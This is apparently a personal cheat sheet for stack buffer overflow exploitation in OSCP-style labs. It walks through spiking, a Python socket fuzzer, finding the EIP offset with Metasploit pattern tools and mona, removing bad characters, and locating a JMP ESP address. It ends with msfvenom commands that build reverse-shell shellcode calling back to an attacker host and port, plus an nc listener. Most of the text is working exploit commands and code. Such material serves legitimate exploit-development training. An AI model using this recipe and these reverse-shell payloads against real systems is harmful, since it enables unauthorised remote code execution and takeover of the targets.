Buffer Overflow

Spiking

nc -nv IP PORT

Find the available commands and start spiking to find vulnerable command

generic_send_tcp HOST PORT stats.spk 0 0

Fuzzing

#!/usr/bin/python
import socket

buffer = ["A"]

counter = 100

while len(buffer) <=30:
    buffer.append("A" * counter)
    counter = counter + 100

for string in buffer:
    print "Fuzzing with %s bytes" % len(string)
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect = s.connect(('10.10.153.41',31337))
    s.send(string + '\r\n')
    data = s.recv(1024)
    s.close()

Finding the Offset

/usr/share/metasploit-framework/tools/exploits/pattern_create.rb -l CRASHBYTES

Copy the output and paste value into the buffer variable in the script.

Run the script and find the EIP overwritten value (Ex: 35724134)

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134

Get exact match for the offset

Or using mona

!mona findmsp -distance CRASHBYTES

Overwrite the EIP

> [*] Exact match at offset 524

Great! Now our payload will be as follow "A"*524 + "B"*4 + badchars. Updated script gives following result:

## Finding bad characters

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

The first of all we should remove from our payload \x00(null byte - break everything what is next) and \x90 (No Operation - do nothing)

Add badchars to script right after the EIP

Follow ESP Hex dump and see what values are missing. (In imunity debugger)

Find the bad chars and keep removing them from the script and repeating the process.

Or making use of mona simply run the following command

!mona bytearray -b "\x00"

Run the script and take not of the memory address to which the ESP register points. Then use it in the following command:

!mona compare -f C:\mona\oscp\bytearray.bin -a 0124FA18

Not all of these might be bad chars! Sometimes bad chars cause the next byte to get corrupted as well, or even affect the rest of the string. Use trial and error.

Finding the right ESP jump instruction

Import mona modules into Immunity debugger

GitHub - corelan/mona: Corelan Repository for mona.py

In Immunity debugger

!mona jmp -r esp
Or browse Window->Log Data

From this command retrieve the JMP address (080414C3). Convert big endian into little endian. 080414C3 --> c3140408

Alternatively

In Immunity debugger

!mona modules

Find modules with protection settings set to false and attatched to the process. (essdunc.dll in this case)

HEX Code equivalent to JMP ESP is FFE4 With this information we can find the JMP address in the dll

!mona find -s "\xff\xe4" -m essdunc.dll

Retrieve the return addresses for the JMP address

Now, we find our JMP ESP address - 311712F3 So, our payload will be as follow: "A" * 2003 + "\xf3\x12\x17\x31" + "\x90" * 32 + shell_code.. Also add a few \x90 NOP values before the shell code. Note that the JMP address is in reverse

## Generate shell code

Test by first trying to open the calculator

msfvenom -p windows/exec -b "\x00" -f python --var-name shellcode CMD=calc.exe EXITFUNC=thread

For windows boxes:

 msfvenom -p windows/shell_rever se_tcp LHOST= LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

  msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f python c -a x86 -b "\x00\x0a"

For Linux box:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.8.26.76 LPORT=9001 -f c -a x86 --platform linux -b "\x00" -e x86/shikata_ga_nai

Note the bad characters. Copy the payload result. Also available: linux/x86/shell_reverse_tcp.

Lastly run the exploit and listen for connections:

nc -nvlp 4444

Additional reading

dostackbufferoverflowgood/dostackbufferoverflowgood_tutorial.pdf at master · justinsteven/dostackbufferoverflowgood · GitHub